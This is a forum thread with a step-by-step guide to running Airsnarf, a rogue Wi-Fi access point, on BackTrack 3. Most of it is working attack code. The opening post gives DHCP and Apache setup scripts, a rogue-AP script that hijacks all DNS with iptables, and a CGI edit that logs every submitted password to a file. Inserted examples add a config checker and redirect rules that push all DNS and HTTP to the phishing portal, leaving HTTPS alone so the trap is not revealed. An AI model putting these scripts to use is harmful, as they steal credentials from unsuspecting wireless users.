Page 1 of 2
Results 1 to 10 of 20

Thread: Airsnarf working on bt3 with atheros card

  1. #1
    Junior Member dapirates1's Avatar
    Join Date
    Nov 2007
    Posts
    88

    Default Airsnarf working on bt3 with atheros card

This guide has been put together from a number of different guides, tested on BT3, and works great. I am using a Proxim 8470-WD card.

First, boot into BackTrack 3.

Make a dir in /var/www called html.
Make a dir in /var/state called dhcp.

Download dhcp-3.0.5-i486-2.tgz, then:
tar -zxvf dhcp-3.0.5-i486-2.tgz
touch /var/state/dhcp/dhcpd.leases

Next, open KWrite and make a file called /etc/rc.d/rc.dhcpd.
Open the file, put this in there, and save it:


#!/bin/sh
#
# /etc/rc.d/rc.dhcpd
#
# Start/stop/restart the ISC DHCP server (dhcpd).
#
# To make dhcpd start automatically at boot, make this
# file executable: chmod 755 /etc/rc.d/rc.dhcpd
#

dhcpd_start() {
    # only start when the binary is executable and the config is readable
    if [ -x /usr/sbin/dhcpd -a -r /etc/dhcpd.conf ]; then
        echo "Starting Dhcp..."
        # hand out leases on the rogue interface only
        /usr/sbin/dhcpd -cf /etc/dhcpd.conf ath0
    fi
}

dhcpd_stop() {
    killall dhcpd
}

dhcpd_restart() {
    dhcpd_stop
    sleep 2
    dhcpd_start
}

case "$1" in
    'start')
        dhcpd_start
        ;;
    'stop')
        dhcpd_stop
        ;;
    'restart')
        dhcpd_restart
        ;;
    *)
        # Default is "start", for backwards compatibility with previous
        # Slackware versions. This may change to a 'usage' error someday.
        dhcpd_start
esac


Then create another file, /etc/rc.d/rc.httpd.
Open the file, put this in there, then save it:


#!/bin/sh
#
# /etc/rc.d/rc.httpd
#
# Start/stop/restart the Apache web server.
#
# To make Apache start automatically at boot, make this
# file executable: chmod 750 /etc/rc.d/rc.httpd
#
conffile=/etc/httpd/httpd.conf

function start() {
    # start with SSL only if httpd.conf pulls in mod_ssl
    if grep -q "^Include /etc/apache/mod_ssl.conf" $conffile ; then
        /usr/sbin/apachectl startssl
    else
        /usr/sbin/apachectl start
    fi
}

function stop() {
    /usr/sbin/apachectl stop
}

function restart() {
    /usr/sbin/apachectl restart
}

# See how we were called.
case "$1" in
    start)
        start
        ;;
    stop)
        stop
        ;;
    restart)
        restart
        ;;
    *)
        echo "usage $0 start|stop|restart" ;;
esac

    chmod 755 /etc/rc.d/rc.httpd
    chmod 755 /etc/rc.d/rc.dhcpd

Go to the airsnarf directory, /pentest/wireless/airsnarf, open the airsnarf script and replace its contents with this:

#!/bin/bash
# airsnarf.sh
# A rogue AP setup utility.

echo "Airsnarf - A rogue AP setup utility."
echo "0.2"
echo "The Shmoo Group"
echo "------------------------------------"
# here are some variables you may want to edit
WWW_ROOT="/var/www/html"
CGI_ROOT="/var/www/cgi-bin"
LOCAL_CFG="./cfg"

# specify another config dir with a command line arg if you want
if [ -n "$1" ]
then
    LOCAL_CFG="$1"
fi

# pulls in ROGUE_SSID, ROGUE_NET, ROGUE_GW and ROGUE_INTERFACE
source "$LOCAL_CFG/airsnarf.cfg"

# create the dhcpd.conf (every AIRSNARF in the template becomes $ROGUE_NET)
echo -n "Creating dhcpd.conf..."
sed "s/AIRSNARF/$ROGUE_NET/g" ./etc/dhcpd.src > /etc/dhcpd.conf
echo "Done."

# copy over the www stuff
echo -n "Building the captive portal..."
cp "$LOCAL_CFG"/html/* "$WWW_ROOT"
cp "$LOCAL_CFG"/cgi-bin/* "$CGI_ROOT"
chmod +x "$CGI_ROOT"/*
echo "Done."

# set our wireless parameters: tear down the madwifi VAP and recreate it
# in AP mode on the underlying wifi0 device. wlanconfig prints the name
# of the VAP it created; if that is not $ROGUE_INTERFACE, fix airsnarf.cfg.
echo -n "Setting the wireless parameters..."
ifconfig "$ROGUE_INTERFACE" down
wlanconfig "$ROGUE_INTERFACE" destroy
wlanconfig "$ROGUE_INTERFACE" create wlandev wifi0 wlanmode ap
ifconfig "$ROGUE_INTERFACE" up
iwconfig "$ROGUE_INTERFACE" essid "$ROGUE_SSID" mode master
echo "Done."

# set our ip and default route
echo -n "Setting the ip address and default route..."
ifconfig "$ROGUE_INTERFACE" "$ROGUE_GW"
route add -net 0.0.0.0 gw "$ROGUE_GW"
echo "Done."

# restart some services (dhcpd on the rogue interface only, so no leases
# are handed out on the uplink)
/usr/sbin/dhcpd -cf /etc/dhcpd.conf "$ROGUE_INTERFACE"
/usr/sbin/apachectl restart
#/etc/init.d/sendmail restart

# set up the firewall to redirect every DNS query to the rogue resolver
echo -n "Setting up firewall to redirect DNS..."
echo 1 > /proc/sys/net/ipv4/ip_forward
modprobe iptable_nat
iptables -F -t nat
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT \
    --to "$ROGUE_GW"
# dammit, I swear this used to work with just an OUTPUT rule...
iptables -t nat -A OUTPUT -p udp --dport 53 -j DNAT \
    --to "$ROGUE_GW"
echo "Done."

# start the local dns resolver (answers every name with $ROGUE_GW)
echo "Starting local DNS resolver..."
chmod +x ./bin/airsnarf_dns.pl
./bin/airsnarf_dns.pl

Now open the cfg folder in the airsnarf directory, edit airsnarf.cfg and replace its contents with:


    ROGUE_SSID="ap name"
    ROGUE_NET="192.168.1."
    ROGUE_GW="192.168.1.254"
    ROGUE_INTERFACE="ath0"
    #export ROGUE_SSID ROGUE_NET ROGUE_GW ROGUE_INTERFACE



Now, for saving to a file, /tmp/airsnarf_pwds.txt:

Open airsnarf-0.2/cfg/cgi-bin and edit airsnarf.cgi.

Comment out (or delete) everything from "$mailprog = '/usr/sbin/sendmail';" until "close(MAIL);"

and replace it with:

# append every submitted form field to the log file instead of mailing it
open (MYFILE, '>>/tmp/airsnarf_pwds.txt') or die "cannot open /tmp/airsnarf_pwds.txt: $!";
foreach $key (keys(%FORM)) {
    print MYFILE "$key = $FORM{$key}\n";
    print MYFILE "----------------------\n";
}
close(MYFILE);

Save the file.

Now run airsnarf and try to connect. You will get "It works!" on screen; don't worry.
Go to /var/www/html and copy it to /var/www/htdocs. Try to connect now from a Windows box etc., then check the passwords.
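The dhcpd.conf in the procedure above is produced by the single sed line in the airsnarf script, and a ROGUE_NET without its trailing dot or a ROGUE_GW outside that prefix only shows up later, as dhcpd refusing to start or clients being handed a gateway on another subnet. The following pre-flight check is an added example and is not code from dapirates1's post or from airsnarf 0.2: it validates the three cfg values and prints the dhcpd.conf the sed step would write. The dhcpd.src template inside it is constructed to mirror the AIRSNARF placeholder convention the script relies on; the range and gateway host numbers in it are assumptions, not the contents of the real ./etc/dhcpd.src.

```shell
#!/bin/sh
# Added example: pre-flight check for airsnarf.cfg plus a preview of the
# dhcpd.conf airsnarf's sed step produces. Not part of the original post
# or of airsnarf 0.2.

# Constructed template (assumption, not the shipped ./etc/dhcpd.src).
# airsnarf runs sed s/AIRSNARF/$ROGUE_NET/g on it, so with
# ROGUE_NET="192.168.1." AIRSNARF0 becomes 192.168.1.0, AIRSNARF254
# becomes 192.168.1.254, and so on.
DHCPD_SRC_TEMPLATE='ddns-update-style none;
subnet AIRSNARF0 netmask 255.255.255.0 {
    range AIRSNARF100 AIRSNARF200;
    option routers AIRSNARF254;
    option domain-name-servers AIRSNARF254;
    default-lease-time 600;
    max-lease-time 7200;
}'

# validate_cfg NET GW IFACE
# Returns 0 when the values fit together, 1 (reason on stderr) otherwise.
# ROGUE_NET must be a three-octet prefix ending in a dot, because sed glues
# host numbers straight onto it; ROGUE_GW must be a host inside that prefix,
# because it is both the dhcpd "routers" option and the DNS DNAT target.
validate_cfg() {
    net="$1"; gw="$2"; iface="$3"
    case "$net" in
        [0-9]*.[0-9]*.[0-9]*.) ;;
        *) echo "ROGUE_NET '$net' must look like 192.168.1. (trailing dot)" >&2; return 1 ;;
    esac
    case "$gw" in
        "$net"*) ;;
        *) echo "ROGUE_GW '$gw' is not inside ROGUE_NET '$net'" >&2; return 1 ;;
    esac
    host="${gw#"$net"}"
    case "$host" in
        ''|*[!0-9]*) echo "ROGUE_GW host part '$host' is not a number" >&2; return 1 ;;
    esac
    if [ "$host" -lt 1 ] || [ "$host" -gt 254 ]; then
        echo "ROGUE_GW host part '$host' is outside 1-254" >&2; return 1
    fi
    case "$iface" in
        ''|*[!A-Za-z0-9_.-]*) echo "ROGUE_INTERFACE '$iface' is not a device name" >&2; return 1 ;;
    esac
    return 0
}

# render_dhcpd_conf NET
# Prints what /etc/dhcpd.conf will contain, so subnet, range and router can
# be eyeballed before dhcpd is started (dhcpd -t -cf FILE syntax-checks it).
render_dhcpd_conf() {
    printf '%s\n' "$DHCPD_SRC_TEMPLATE" | sed "s/AIRSNARF/$1/g"
}

# Usage from the airsnarf directory: reads ./cfg/airsnarf.cfg exactly as
# airsnarf does, then validates it and prints the rendered config.
if [ -r ./cfg/airsnarf.cfg ]; then
    . ./cfg/airsnarf.cfg
    validate_cfg "$ROGUE_NET" "$ROGUE_GW" "$ROGUE_INTERFACE" \
        && render_dhcpd_conf "$ROGUE_NET"
fi
```

Run it from /pentest/wireless/airsnarf before starting airsnarf; a non-zero exit with a message on stderr means the cfg needs fixing, and the printed config is what dhcpd will load.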

  2. #2
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

Why copy all the files across? Just modify:

    Code:
    # here are some variables you may want to edit
    WWW_ROOT="/var/www/htdocs"
    CGI_ROOT="/var/www/cgi-bin"
    LOCAL_CFG="./cfg"
    Cheers

  3. #3
    Junior Member dapirates1's Avatar
    Join Date
    Nov 2007
    Posts
    88

    Default

Thanks for the info, Dr_GrEeN. I have done that now; I should have noticed that, lol.

  4. #4
    Senior Member imported_spankdidly's Avatar
    Join Date
    Feb 2006
    Posts
    1,031

    Default

Good tut, dapirates. I always loved a lil' airsnarfin'. Well, airsnarfin' at my house with my equipment.
    I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!

  5. #5
    coool
    Guest

    Default

This topic is useful.

I will test this afterwards.

  6. #6
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    8

    Default

    Thanks for the info- I'm going to have to give this a try when I get BT3 up and running on my laptop with a PCMCIA slot. Anyone had any luck using airsnarf with a RT75 USB chipset? I'd love to get it working on my new laptop that doesn't have a PCMCIA slot for my atheros chip.

  7. #7
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    8

    Default

    bump.....................

  8. #8
    Junior Member dapirates1's Avatar
    Join Date
    Nov 2007
    Posts
    88

    Default

I have made this video, Airsnarfing on BackTrack 3, and also uploaded all the files needed to Rapidshare.

    http://dapirates1.blip.tv/#650915

    I hope it comes in handy to some of you.
    My life is a living Hell, Day by Day fixing broken Windows Boxes (will it ever end)

  9. #9
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    8

    Default

    Bump da Bump? Anyone have any modifications for this that will work for the USB drivers? My new laptop doesn't support PCMCIA so I can't use my Atheros card any longer. I've been using the rausb0 device through VMWare. Anyone else in the same boat?

  10. #10
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    5

    Default

This is a fantastic guide. I followed it closely and it took a while, but things eventually worked. I have one query though. How do you make all HTML requests go to the gateway address? I got everything working just like yours, and when I connect to the rogue AP I'm not directed to anything, I just get blank pages; the only page that works is the rogue AP address. Is there any way to redirect all HTML requests to the local server? This might be an Apache thing, I've never been great with Apache.
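The script in the first post only DNATs UDP/53, so a client reaches the portal only after it has asked the rogue resolver for a name; a client that already has an address cached, or that opens a plain IP, is never steered to Apache. The rule set below is an added example, not code from this thread or from airsnarf 0.2, and it generalises that step: DNS over UDP and TCP plus every plain-HTTP connection entering on the rogue interface are DNATed to the portal host. It assumes iptables with the nat table available (the modprobe iptable_nat in airsnarf covers that) and takes the interface and gateway values from airsnarf.cfg as arguments; with DRY_RUN=1 it prints the commands instead of running them, so the rules can be reviewed without root.

```shell
#!/bin/sh
# Added example, not part of the original thread or of airsnarf 0.2:
# nat rules that land a rogue-AP client on the captive portal whichever
# address it tries. Assumes iptables with iptable_nat loaded; the
# interface and gateway come from airsnarf.cfg (ROGUE_INTERFACE, ROGUE_GW).

DRY_RUN="${DRY_RUN:-0}"

# run CMD ARGS...: execute the command, or just print it under DRY_RUN=1
run() {
    if [ "$DRY_RUN" = "1" ]; then
        echo "$*"
    else
        "$@"
    fi
}

# portal_nat_rules IFACE GW
# Flushes PREROUTING in the nat table and installs three DNAT rules. Only
# packets that enter on IFACE are matched (-i), so the box's uplink and
# its own outgoing traffic are left alone.
portal_nat_rules() {
    iface="$1"; gw="$2"
    run iptables -t nat -F PREROUTING
    # DNS over UDP and TCP: every query goes to the rogue resolver on GW
    run iptables -t nat -A PREROUTING -i "$iface" -p udp --dport 53 \
        -j DNAT --to-destination "$gw:53"
    run iptables -t nat -A PREROUTING -i "$iface" -p tcp --dport 53 \
        -j DNAT --to-destination "$gw:53"
    # HTTP: whatever IP the client connects to, the TCP session ends up on
    # the portal's Apache, cached DNS or hard-coded addresses included
    run iptables -t nat -A PREROUTING -i "$iface" -p tcp --dport 80 \
        -j DNAT --to-destination "$gw:80"
    # TCP/443 is deliberately not redirected: the client would only get a
    # certificate mismatch, which is a giveaway rather than a portal.
}

# Usage:  DRY_RUN=1 sh portal_nat.sh ath0 192.168.1.254   # review the rules
#         sh portal_nat.sh ath0 192.168.1.254             # apply them, as root
if [ $# -eq 2 ]; then
    portal_nat_rules "$1" "$2"
fi
```

The DNAT only gets the TCP session to Apache; Apache still answers according to the path the client asked for, so a request for a page that does not exist under the DocumentRoot returns a 404 rather than the portal page. A catch-all such as ErrorDocument 404 /index.html in httpd.conf (a core Apache directive; the file name is whatever the portal page is called) is the usual way to serve the portal for every path.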

